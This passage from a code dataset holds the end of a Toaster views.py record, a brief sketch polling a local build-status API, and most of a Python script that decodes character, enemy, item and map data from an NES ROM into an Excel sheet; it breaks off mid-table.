\"unavailable_artifact.html\")\n\n","repo_name":"openbmc/openbmc","sub_path":"poky/bitbake/lib/toaster/toastergui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":83444,"program_lang":"python","lang":"en","doc_type":"code","stars":1525,"dataset":"github-code","pt":"16"}
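# A minimal, illustrative sketch of how an external manager might consume\n# the JSON status views above (json_builds/json_building/json_build): it\n# polls the endpoint, then reads the fields emitted by _json_build_status().\n# The URL path and port below are assumptions about the toastergui routing\n# and the development server, not values taken from this module.\nfrom urllib.request import urlopen\n\ndef _poll_toaster_builds(base_url=\"http://localhost:8000\"):\n    # json_builds() responds with {'builds': [...], 'count': N}\n    with urlopen(base_url + \"/toastergui/api/builds\") as resp:\n        data = json.loads(resp.read().decode(\"utf-8\"))\n    for build_stat in data.get(\"builds\", []):\n        # 'outcome' is only present for completed builds, so use .get()\n        print(build_stat.get(\"id\"), build_stat.get(\"name\"), build_stat.get(\"outcome\"))\n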
+{"seq_id":"17821989844","text":"#!/usr/bin/env python3\n\n\"\"\"Dump data in an iNES ROM file.\n\nUsage:\n poetry install\n poetry run ./jvqdump.py input_ines_file_path output_excel_file_path\n\"\"\"\n\nimport argparse\nimport binascii\nimport collections\nimport dataclasses\nimport enum\nimport itertools\nimport operator\nimport struct\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union\n\nimport openpyxl\nimport openpyxl.styles\n\n_ENEMY_GROUP_PATTERN_LIST_ID_COUNT = 155\n_MAP_ID_COUNT = 350\n_MAX_ACTIONS_PER_ENEMY = 8\n_ENEMY_ID_COUNT = 173\n\n\ndef _read_prg_rom(input_ines_file_path: str) -> bytes:\n ines_header_byte_size = 16\n with open(input_ines_file_path, \"rb\") as f:\n header_bytes = f.read(ines_header_byte_size)\n if len(header_bytes) != ines_header_byte_size:\n raise ValueError(\"Invalid iNES header\")\n if header_bytes[0:4] != b\"NES\\x1a\":\n raise ValueError(\"Invalid signature\")\n prg_rom_byte_size = header_bytes[4] * 0x4000\n prg_rom_bytes = f.read(prg_rom_byte_size)\n if len(prg_rom_bytes) != prg_rom_byte_size:\n raise ValueError(\"Insufficient PRG ROM\")\n return prg_rom_bytes\n\n\ndef _decode_string(str_bytes: bytes) -> str:\n byte_to_str = {\n # 0x00: ??\n 0x01: \"あ\",\n 0x02: \"い\",\n 0x03: \"う\",\n 0x04: \"え\",\n 0x05: \"お\",\n 0x06: \"か\",\n 0x07: \"き\",\n 0x08: \"く\",\n 0x09: \"け\",\n 0x0A: \"こ\",\n 0x0B: \"さ\",\n 0x0C: \"し\",\n 0x0D: \"す\",\n 0x0E: \"せ\",\n 0x0F: \"そ\",\n # 0x10: 半濁点\n 0x11: \"た\",\n 0x12: \"ち\",\n 0x13: \"つ\",\n 0x14: \"て\",\n 0x15: \"と\",\n 0x16: \"な\",\n 0x17: \"に\",\n 0x18: \"ぬ\",\n 0x19: \"ね\",\n 0x1A: \"の\",\n 0x1B: \"は\",\n 0x1C: \"ひ\",\n 0x1D: \"ふ\",\n 0x1E: \"へ\",\n 0x1F: \"ほ\",\n 0x20: \"両\",\n 0x21: \"ま\",\n 0x22: \"み\",\n 0x23: \"む\",\n 0x24: \"め\",\n 0x25: \"も\",\n 0x26: \"や\",\n 0x27: \"ゆ\",\n 0x28: \"よ\",\n 0x29: \"ら\",\n 0x2A: \"り\",\n 0x2B: \"る\",\n 0x2C: \"れ\",\n 0x2D: \"ろ\",\n 0x2E: \"わ\",\n 0x2F: \"を\",\n 0x30: \"0\",\n 0x31: \"1\",\n 0x32: \"2\",\n 0x33: \"3\",\n 0x34: \"4\",\n 0x35: \"5\",\n 0x36: \"6\",\n 0x37: \"7\",\n 0x38: \"8\",\n 0x39: \"9\",\n 0x3A: \"!\",\n 0x3B: \"?\",\n 0x3C: \"「\",\n 0x3D: \"/\",\n 0x3E: \"・\",\n 0x3F: \"ん\",\n 0x40: \"■\",\n 0x41: \"ア\",\n 0x42: \"イ\",\n 0x43: \"ウ\",\n 0x44: \"エ\",\n 0x45: \"オ\",\n 0x46: \"カ\",\n 0x47: \"キ\",\n 0x48: \"ク\",\n 0x49: \"ケ\",\n 0x4A: \"コ\",\n 0x4B: \"サ\",\n 0x4C: \"シ\",\n 0x4D: \"ス\",\n 0x4E: \"セ\",\n 0x4F: \"ソ\",\n # 0x50: ??\n 0x51: \"タ\",\n 0x52: \"チ\",\n 0x53: \"ツ\",\n 0x54: \"テ\",\n 0x55: \"ト\",\n 0x56: \"ナ\",\n 0x57: \"ニ\",\n 0x58: \"ヌ\",\n 0x59: \"ネ\",\n 0x5A: \"ノ\",\n 0x5B: \"ハ\",\n 0x5C: \"ヒ\",\n 0x5D: \"フ\",\n 0x5E: \"ー\",\n 0x5F: \"ホ\",\n # 0x60: ??\n 0x61: \"マ\",\n 0x62: \"ミ\",\n 0x63: \"ム\",\n 0x64: \"メ\",\n 0x65: \"モ\",\n 0x66: \"ヤ\",\n 0x67: \"ユ\",\n 0x68: \"ヨ\",\n 0x69: \"ラ\",\n 0x6A: \"◆\",\n 0x6B: \"ル\",\n 0x6C: \"レ\",\n 0x6D: \"ロ\",\n 0x6E: \"ワ\",\n 0x6F: \"超\",\n # 0x70: Frame\n # 0x71: Frame\n # 0x72: Frame\n # 0x73: Frame\n # 0x74: Frame\n # 0x75: Frame\n # 0x76: Frame\n # 0x77: Frame\n 0x78: \"ッ\",\n 0x79: \"ャ\",\n 0x7A: \"ュ\",\n 0x7B: \"ョ\",\n 0x7C: \"ァ\",\n 0x7D: \"っ\",\n 0x7E: \"ゃ\",\n 0x7F: \"ン\",\n 0x80: \"ゅ\",\n 0x81: \"ょ\",\n # 0x82: ??\n 0x83: \"ェ\",\n # 0x84: ??\n # 0x85: ??\n 0x86: \"が\",\n 0x87: \"ぎ\",\n 0x88: \"ぐ\",\n 0x89: \"げ\",\n 0x8A: \"ご\",\n 0x8B: \"ざ\",\n 0x8C: \"じ\",\n 0x8D: \"ず\",\n 0x8E: \"ぜ\",\n 0x8F: \"ぞ\",\n # 0x90: Invalid\n 0x91: \"だ\",\n 0x92: \"ぢ\",\n 0x93: \"づ\",\n 0x94: \"で\",\n 0x95: \"ど\",\n # 0x96: Invalid\n # 0x97: Invalid\n # 0x98: Invalid\n # 0x99: Invalid\n # 0x9A: Invalid\n 0x9B: 
\"ば\",\n 0x9C: \"び\",\n 0x9D: \"ぶ\",\n 0x9E: \"べ\",\n 0x9F: \"ぼ\",\n # 0xA0: Invalid\n 0xA1: \"ぱ\",\n 0xA2: \"ぴ\",\n 0xA3: \"ぶ\",\n 0xA4: \"ぺ\",\n 0xA5: \"ぽ\",\n 0xA6: \"パ\",\n 0xA7: \"ピ\",\n 0xA8: \"プ\",\n # 0xA9: Invalid\n 0xAA: \"ポ\",\n # 0xAB: Invalid\n # 0xAC: Invalid\n # 0xAD: Invalid\n # 0xAE: Invalid\n # 0xAF: Invalid\n # 0xB0: Invalid\n # 0xB1: Invalid\n # 0xB2: Invalid\n # 0xB3: Invalid\n # 0xB4: Invalid\n # 0xB5: Invalid\n # 0xB6: Invalid\n # 0xB7: Invalid\n # 0xB8: Invalid\n # 0xB9: Invalid\n # 0xBA: Invalid\n # 0xBB: Invalid\n # 0xBC: Invalid\n # 0xBD: Invalid\n # 0xBE: Invalid\n # 0xBF: Invalid\n # 0xC0: Invalid\n # 0xC1: Invalid\n # 0xC2: Invalid\n # 0xC3: Invalid\n # 0xC4: Invalid\n # 0xC5: Invalid\n 0xC6: \"ガ\",\n 0xC7: \"ギ\",\n 0xC8: \"グ\",\n 0xC9: \"ゲ\",\n 0xCA: \"ゴ\",\n 0xCB: \"ザ\",\n 0xCC: \"ジ\",\n 0xCD: \"ズ\",\n 0xCE: \"ゼ\",\n 0xCF: \"ゾ\",\n # 0xD0: Invalid\n 0xD1: \"ダ\",\n 0xD2: \"ヂ\",\n 0xD3: \"ヅ\",\n 0xD4: \"デ\",\n 0xD5: \"ド\",\n # 0xD6: Invalid\n # 0xD7: Invalid\n # 0xD8: Invalid\n # 0xD9: Invalid\n # 0xDA: Invalid\n 0xDB: \"バ\",\n 0xDC: \"ビ\",\n 0xDD: \"ブ\",\n # 0xDE: Invalid\n 0xDF: \"ボ\",\n # 0xE0: Invalid\n # 0xE1: Invalid\n # 0xE2: Invalid\n # 0xE3: Invalid\n # 0xE4: Invalid\n # 0xE5: Invalid\n # 0xE6: Invalid\n # 0xE7: Invalid\n # 0xE8: Invalid\n # 0xE9: Invalid\n # 0xEA: Invalid\n # 0xEB: Invalid\n # 0xEC: Invalid\n # 0xED: Invalid\n # 0xEE: Invalid\n # 0xEF: Invalid\n # 0xF0: Invalid\n # 0xF1: Invalid\n # 0xF2: Invalid\n # 0xF3: Invalid\n # 0xF4: Invalid\n # 0xF5: Invalid\n # 0xF6: Invalid\n # 0xF7: Invalid\n # 0xF8: Invalid\n # 0xF9: Invalid\n # 0xFA: Invalid\n # 0xFB: Invalid\n # 0xFC: Invalid\n # 0xFD: Invalid\n # 0xFE: Invalid\n 0xFF: \" \", # Space\n }\n return \"\".join(byte_to_str[s] for s in str_bytes)\n\n\n@enum.unique\nclass _PlayerCharacterType(enum.Enum):\n JUVEI = \"じゅうべえ\"\n RYUHIME = \"りゅうひめ\"\n WOLF = \"ウルフ・シロ\"\n IWAN = \"イワン・ガンちゃん\"\n ONITAN = \"オニタン\"\n HINOTORI = \"ひのとり\"\n SARUBOSS = \"サルボス\"\n PENTA = \"ペンタ\"\n LUCKY = \"ラッキー\"\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacterLevel:\n level: int\n hp: int # 命\n cp: int # 超力\n attack: int # 攻撃\n defense: int # 守備\n speed: int # スピード\n ten: int # 天の守り\n shin: int # 芯の強さ\n atama: int # 頭の良さ\n experience_required_from_previous_level: int\n accumulated_experience_required: int\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacter:\n player_character_type: _PlayerCharacterType\n max_level: int\n levels: Sequence[_PlayerCharacterLevel]\n\n\ndef _get_player_character_max_level(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> int:\n prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x03C097,\n _PlayerCharacterType.WOLF: 0x03C09C,\n _PlayerCharacterType.RYUHIME: 0x03C098,\n _PlayerCharacterType.IWAN: 0x03C09A,\n _PlayerCharacterType.ONITAN: 0x03C09B,\n _PlayerCharacterType.HINOTORI: 0x03C09D,\n _PlayerCharacterType.SARUBOSS: 0x03C09E,\n _PlayerCharacterType.PENTA: 0x03C09F,\n _PlayerCharacterType.LUCKY: 0x03C0A0,\n }[player_character_type]\n return prg_rom_bytes[prg_rom_address]\n\n\ndef _get_player_character(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> _PlayerCharacter:\n status_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027713,\n _PlayerCharacterType.WOLF: 0x0278D5,\n _PlayerCharacterType.RYUHIME: 0x027A97,\n _PlayerCharacterType.IWAN: 0x027C59,\n _PlayerCharacterType.ONITAN: 0x027DF0,\n _PlayerCharacterType.HINOTORI: 0x027E4A,\n _PlayerCharacterType.SARUBOSS: 0x027EA4,\n _PlayerCharacterType.PENTA: 
0x027EEC,\n _PlayerCharacterType.LUCKY: 0x027F46,\n }[player_character_type]\n experience_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027519,\n _PlayerCharacterType.WOLF: 0x02757D,\n _PlayerCharacterType.RYUHIME: 0x0275E1,\n _PlayerCharacterType.IWAN: 0x027645,\n _PlayerCharacterType.ONITAN: 0x002769F,\n _PlayerCharacterType.HINOTORI: 0x0276B3,\n _PlayerCharacterType.SARUBOSS: 0x0276C7,\n _PlayerCharacterType.PENTA: 0x0276D7,\n _PlayerCharacterType.LUCKY: 0x0276EB,\n }[player_character_type]\n max_level = _get_player_character_max_level(prg_rom_bytes, player_character_type)\n experience_unit_byte_size = 2\n status_unit_byte_size = 9\n accumulated_experience_required = 0\n player_character_levels = []\n for level in range(1, max_level + 1):\n status_offset = status_start_prg_rom_address + (level - 1) * status_unit_byte_size\n (hp, cp, attack, defense, speed, ten, shin, atama) = struct.unpack_from(\" _EnemyGroupPatternList:\n prg_rom_address = 0x00F704\n list_id = 0\n while list_id < enemy_group_pattern_list_id:\n if prg_rom_bytes[prg_rom_address] == 0xFF:\n list_id += 1\n prg_rom_address += 1\n enemy_group_pattern_ids = []\n while prg_rom_bytes[prg_rom_address] != 0xFF:\n enemy_group_pattern_ids.append(prg_rom_bytes[prg_rom_address])\n prg_rom_address += 1\n return _EnemyGroupPatternList(enemy_group_pattern_ids=tuple(enemy_group_pattern_ids))\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyGroupPattern:\n enemy_group_size: int\n enemy_group_0_size: int\n enemy_group_0_enemy_id: Optional[int]\n enemy_group_1_size: int\n enemy_group_1_enemy_id: Optional[int]\n enemy_group_2_size: int\n enemy_group_2_enemy_id: Optional[int]\n\n\ndef _get_enemy_group_pattern(prg_rom_bytes: bytes, enemy_group_pattern_id: int) -> _EnemyGroupPattern:\n assert 0 < enemy_group_pattern_id\n prg_rom_address = 0x00FA48\n pattern_id = 0\n while pattern_id < enemy_group_pattern_id:\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n if enemy_group_0_size != 0:\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n if enemy_group_1_size != 0:\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n if enemy_group_2_size != 0:\n prg_rom_address += 1\n pattern_id += 1\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n enemy_group_size = 0\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n enemy_group_0_enemy_id = None\n if enemy_group_0_size != 0:\n enemy_group_0_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n enemy_group_1_enemy_id = None\n if enemy_group_1_size != 0:\n enemy_group_1_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n enemy_group_2_enemy_id = None\n if enemy_group_2_size != 0:\n enemy_group_2_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n return _EnemyGroupPattern(\n enemy_group_size=enemy_group_size,\n enemy_group_0_size=enemy_group_0_size,\n enemy_group_0_enemy_id=enemy_group_0_enemy_id,\n enemy_group_1_size=enemy_group_1_size,\n enemy_group_1_enemy_id=enemy_group_1_enemy_id,\n enemy_group_2_size=enemy_group_2_size,\n enemy_group_2_enemy_id=enemy_group_2_enemy_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionId:\n action_ids: 
Sequence[int]\n\n\ndef _get_enemy_action_id(prg_rom_bytes: bytes, raw_action_id: int) -> _EnemyActionId:\n assert 1 <= raw_action_id\n start_prg_rom_address = 0x00FF93 + (raw_action_id - 1)\n action_id = prg_rom_bytes[start_prg_rom_address]\n if action_id < 0x80:\n return _EnemyActionId(action_ids=tuple([action_id]))\n action_id = (action_id << 1) & 0xFF\n return _EnemyActionId(\n action_ids=tuple(\n [\n prg_rom_bytes[0x00FFEE + action_id],\n prg_rom_bytes[0x00FFEE + action_id + 1],\n ]\n )\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionPattern:\n raw_action_id_0: int\n raw_action_id_1: int\n raw_action_id_2: int\n raw_action_id_3: int\n action_id_0: _EnemyActionId\n action_id_1: _EnemyActionId\n action_id_2: _EnemyActionId\n action_id_3: _EnemyActionId\n action_threshold_0: int\n action_threshold_1: int\n action_threshold_2: int\n action_threshold_3: int\n\n\ndef _get_enemy_action_pattern(prg_rom_bytes: bytes, enemy_action_pattern_id: int) -> _EnemyActionPattern:\n assert enemy_action_pattern_id <= 0x3F\n enemy_action_pattern_unit_byte_size = 8\n start_prg_rom_address = 0x00F442 + enemy_action_pattern_id * enemy_action_pattern_unit_byte_size\n enemy_action_pattern = _EnemyActionPattern(\n raw_action_id_0=prg_rom_bytes[start_prg_rom_address],\n raw_action_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n raw_action_id_2=prg_rom_bytes[start_prg_rom_address + 2],\n raw_action_id_3=prg_rom_bytes[start_prg_rom_address + 3],\n action_id_0=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address]),\n action_id_1=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 1]),\n action_id_2=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 2]),\n action_id_3=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 3]),\n action_threshold_0=prg_rom_bytes[start_prg_rom_address + 4],\n action_threshold_1=prg_rom_bytes[start_prg_rom_address + 5],\n action_threshold_2=prg_rom_bytes[start_prg_rom_address + 6],\n action_threshold_3=prg_rom_bytes[start_prg_rom_address + 7],\n )\n # Validate that the sum of the thresholds should be around 0xFF.\n assert 0xFA <= (enemy_action_pattern.action_threshold_0 + enemy_action_pattern.action_threshold_1 + enemy_action_pattern.action_threshold_2 + enemy_action_pattern.action_threshold_3) <= 0x100\n return enemy_action_pattern\n\n\ndef _aggregate_enemy_action_pattern(enemy_action_pattern: _EnemyActionPattern) -> Dict[int, int]:\n action_threshold_0 = enemy_action_pattern.action_threshold_0\n action_threshold_1 = enemy_action_pattern.action_threshold_1\n action_threshold_2 = enemy_action_pattern.action_threshold_2\n action_threshold_3 = 0x100 - (action_threshold_0 + action_threshold_1 + action_threshold_2)\n assert 0x00 <= action_threshold_3\n threshold_by_action_id: Dict[int, int] = collections.defaultdict(int)\n for action_id in enemy_action_pattern.action_id_0.action_ids:\n threshold_by_action_id[action_id] += action_threshold_0 * 2 // len(enemy_action_pattern.action_id_0.action_ids)\n for action_id in enemy_action_pattern.action_id_1.action_ids:\n threshold_by_action_id[action_id] += action_threshold_1 * 2 // len(enemy_action_pattern.action_id_1.action_ids)\n for action_id in enemy_action_pattern.action_id_2.action_ids:\n threshold_by_action_id[action_id] += action_threshold_2 * 2 // len(enemy_action_pattern.action_id_2.action_ids)\n for action_id in enemy_action_pattern.action_id_3.action_ids:\n threshold_by_action_id[action_id] += action_threshold_3 * 2 // 
len(enemy_action_pattern.action_id_3.action_ids)\n assert sum(threshold_by_action_id.values()) == 0x100 * 2, sum(threshold_by_action_id.values())\n return threshold_by_action_id\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ActionName:\n action_name_bytes: bytes\n action_name: str\n\n\ndef _get_action_name(prg_rom_bytes: bytes, action_id: int) -> _ActionName:\n if action_id == 0xEE:\n return _ActionName(\n action_name_bytes=b\"\",\n action_name=\"こうげき \",\n )\n action_name_unit_byte_size = 8\n start_prg_rom_address = 0x02634D + action_id * action_name_unit_byte_size\n action_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + action_name_unit_byte_size - 1]\n return _ActionName(\n action_name_bytes=action_name_bytes,\n action_name=_decode_string(action_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemDropPattern:\n drop_item_id_0: int\n drop_item_id_1: int\n item_drop_threshold: int\n\n\ndef _get_item_drop_pattern(prg_rom_bytes: bytes, item_drop_pattern_id: int) -> _ItemDropPattern:\n assert item_drop_pattern_id <= 0x3F\n item_drop_pattern_unit_byte_size = 3\n start_prg_rom_address = 0xF643 + item_drop_pattern_id * item_drop_pattern_unit_byte_size\n return _ItemDropPattern(\n drop_item_id_0=prg_rom_bytes[start_prg_rom_address],\n drop_item_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n item_drop_threshold=prg_rom_bytes[start_prg_rom_address + 2],\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemName:\n item_name_bytes: bytes\n item_name: str\n\n\ndef _get_item_name(prg_rom_bytes: bytes, item_id: int) -> _ItemName:\n assert 0x00 < item_id\n item_name_unit_byte_size = 8\n start_prg_rom_address = 0x026685 + item_id * item_name_unit_byte_size\n item_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + item_name_unit_byte_size - 1]\n return _ItemName(\n item_name_bytes=item_name_bytes,\n item_name=_decode_string(item_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyName:\n enemy_name_bytes: bytes\n enemy_name: str\n\n\ndef _get_enemy_name(prg_rom_bytes: bytes, enemy_id: int) -> _EnemyName:\n assert 0x00 < enemy_id\n enemy_name_unit_byte_size = 8\n start_prg_rom_address = 0x25AD5 + enemy_id * enemy_name_unit_byte_size\n enemy_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + enemy_name_unit_byte_size - 1]\n return _EnemyName(\n enemy_name_bytes=enemy_name_bytes,\n enemy_name=_decode_string(enemy_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Enemy:\n hp: int\n min_hp: int\n max_hp: int\n cp: int\n attack: int\n defense: int\n speed: int\n money: int\n experience: int\n escapable: bool\n attack_twice: bool\n hittability: int\n mihagito_endurance: bool\n kurusu_endurance: bool\n beto_endurance: bool\n choriki_endurance_1: int\n choriki_endurance_2: int\n choriki_endurance_3_4: int\n choriki_endurance_5: int\n choriki_endurance_6: int\n mahuuji_endurance: int\n mahuuji_effectiveness: int\n lullaby_endurance: int\n lullaby_effectiveness: int\n parapa_endurance: int\n parapa_effectiveness: int\n action_pattern_id: int\n item_drop_pattern_id: int\n\n\ndef _decode_enemy_value(enemy_data: Dict[int, int], y: int) -> int:\n assert 0 <= y\n value = ((enemy_data[0x6000] >> y) * 0x100 + enemy_data[0x6001 + y]) & 0x1FF\n bit_count = 0\n for i in range(5):\n ends_with_one = value & 0x01 != 0\n if ends_with_one:\n bit_count += 1\n value = (value >> 1) & 0xFF\n if not ends_with_one:\n break\n if bit_count == 0:\n return value\n elif bit_count <= 3:\n return (value + 1) 
* (10**bit_count)\n elif bit_count == 4:\n v = (value + 1) * 1000\n if (v & 0x6000) != 0:\n return 0xFFFF\n else:\n # エイりアンドー\n return 0x9C50\n raise ValueError(\"Invalid enemy_data.\")\n\n\ndef _calculate_enemy_hp_range(hp: int) -> Tuple[int, int]:\n diff = min(hp // 8, 0xFF)\n return (hp - diff, hp + diff)\n\n\ndef _get_enemy(prg_rom_bytes: bytes, enemy_id: int) -> _Enemy:\n assert 0 < enemy_id\n enemy_status_unit_byte_size = 0x14\n enemy_status_start_prg_rom_address = 0x00E1C2 + (enemy_id - 1) * enemy_status_unit_byte_size\n enemy_data: Dict[int, int] = {}\n for i in range(enemy_status_unit_byte_size):\n enemy_data[0x6000 + i] = prg_rom_bytes[enemy_status_start_prg_rom_address + i]\n experience = _decode_enemy_value(enemy_data, 0)\n hp = _decode_enemy_value(enemy_data, 1)\n (min_hp, max_hp) = _calculate_enemy_hp_range(hp)\n attack = _decode_enemy_value(enemy_data, 2)\n defense = _decode_enemy_value(enemy_data, 3)\n cp = _decode_enemy_value(enemy_data, 4)\n speed = _decode_enemy_value(enemy_data, 5)\n money = _decode_enemy_value(enemy_data, 6)\n escapable = (enemy_data[0x6008] & 0x04) == 0\n attack_twice = (enemy_data[0x6008] & 0x30) in (0x10, 0x20)\n hittability = (enemy_data[0x6008] & 0xC0) >> 6\n mihagito_endurance = (enemy_data[0x6008] & 0x08) != 0\n kurusu_endurance = not escapable\n beto_endurance = (enemy_data[0x6008] & 0x02) != 0\n # #$C0:属性2(火炎系)\n choriki_endurance_2 = (enemy_data[0x6009] & 0xC0) >> 6\n # #$C0:属性5(電撃系), #$30:属性3-4(水撃系・氷結系), #$0C:属性1(地震系), #$03:属性6(爆発系)\n choriki_endurance_5 = (enemy_data[0x600A] & 0xC0) >> 6\n choriki_endurance_3_4 = (enemy_data[0x600A] & 0x30) >> 4\n choriki_endurance_1 = (enemy_data[0x600A] & 0x0C) >> 2\n choriki_endurance_6 = enemy_data[0x600A] & 0x03\n mahuuji_endurance = (enemy_data[0x600B] & 0xC0) >> 6\n mahuuji_effectiveness = (enemy_data[0x600B] & 0x30) >> 4\n lullaby_endurance = (enemy_data[0x600B] & 0x0C) >> 2\n lullaby_effectiveness = enemy_data[0x600B] & 0x03\n parapa_endurance = (enemy_data[0x600C] & 0x0C) >> 2\n parapa_effectiveness = enemy_data[0x600C] & 0x03\n action_pattern_id = enemy_data[0x6009] & 0x3F\n item_drop_pattern_id = enemy_data[0x600D] & 0x3F\n return _Enemy(\n hp=hp,\n min_hp=min_hp,\n max_hp=max_hp,\n cp=cp,\n attack=attack,\n defense=defense,\n speed=speed,\n experience=experience,\n money=money,\n escapable=escapable,\n attack_twice=attack_twice,\n hittability=hittability,\n mihagito_endurance=mihagito_endurance,\n kurusu_endurance=kurusu_endurance,\n beto_endurance=beto_endurance,\n choriki_endurance_1=choriki_endurance_1,\n choriki_endurance_2=choriki_endurance_2,\n choriki_endurance_3_4=choriki_endurance_3_4,\n choriki_endurance_5=choriki_endurance_5,\n choriki_endurance_6=choriki_endurance_6,\n mahuuji_endurance=mahuuji_endurance,\n mahuuji_effectiveness=mahuuji_effectiveness,\n lullaby_endurance=lullaby_endurance,\n lullaby_effectiveness=lullaby_effectiveness,\n parapa_endurance=parapa_endurance,\n parapa_effectiveness=parapa_effectiveness,\n action_pattern_id=action_pattern_id,\n item_drop_pattern_id=item_drop_pattern_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Map:\n enemy_group_pattern_list_id: int\n encounter_threshold_id: int\n\n\ndef _get_map(prg_rom_bytes: bytes, map_id: int) -> _Map:\n map_unit_byte_size = 12\n start_prg_rom_address = 0x8004 + map_id * map_unit_byte_size\n v008F = prg_rom_bytes[start_prg_rom_address + 1]\n if v008F == 0x01:\n enemy_group_pattern_list_id = 0x78\n elif v008F == 0x02:\n enemy_group_pattern_list_id = 0x00\n else:\n v0091 = 
prg_rom_bytes[start_prg_rom_address + 3]\n enemy_group_pattern_list_id = v0091\n if enemy_group_pattern_list_id >= 0x9B:\n enemy_group_pattern_list_id = 0x01\n v0098 = prg_rom_bytes[start_prg_rom_address + 10]\n encounter_threshold_id = v0098 >> 5\n return _Map(enemy_group_pattern_list_id=enemy_group_pattern_list_id, encounter_threshold_id=encounter_threshold_id)\n\n\n_LEFT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"left\", vertical=\"top\")\n_RIGHT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"right\", vertical=\"top\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ColumnStyle:\n caption: str\n cell_alignment: openpyxl.styles.Alignment = _LEFT_ALIGNMENT\n\n\ndef _fill_worksheet_header_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle]) -> None:\n for column_index, header in enumerate(header_row, 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = header.caption\n\n\ndef _fill_worksheet_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle], row: List[Any]) -> None:\n for column_index, (header_column, column) in enumerate(zip(header_row, row), 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = column\n cell.alignment = header_column.cell_alignment\n\n\ndef _fill_player_character(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"キャラクター名\"),\n _ColumnStyle(caption=\"最大レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"守備\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"天の守り\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"芯の強さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"頭の良さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"前レベルからの必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"累積必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for player_character_type in _PlayerCharacterType:\n player_character = _get_player_character(prg_rom_bytes, player_character_type)\n for level in player_character.levels:\n row = [\n player_character.player_character_type.value,\n player_character.max_level,\n level.level,\n level.hp,\n level.cp,\n level.attack,\n level.defense,\n level.speed,\n level.ten,\n level.shin,\n level.atama,\n level.experience_required_from_previous_level,\n level.accumulated_experience_required,\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_chapter_name_of_enemy(enemy_id: int) -> str:\n # NOTE: This list may be incorrect.\n return {\n 0x01: \"ボス\", # ウシまつ\n 0x02: \"ボス\", # おおなまず\n 0x04: \"1の巻\", # どくまんじゅう\n 0x05: \"1の巻\", # レッドスネーク\n 0x06: \"1の巻\", # しろぼうず\n 0x07: \"1の巻\", # カマおとこ\n 0x08: \"ボス\", # まむしおとこ\n 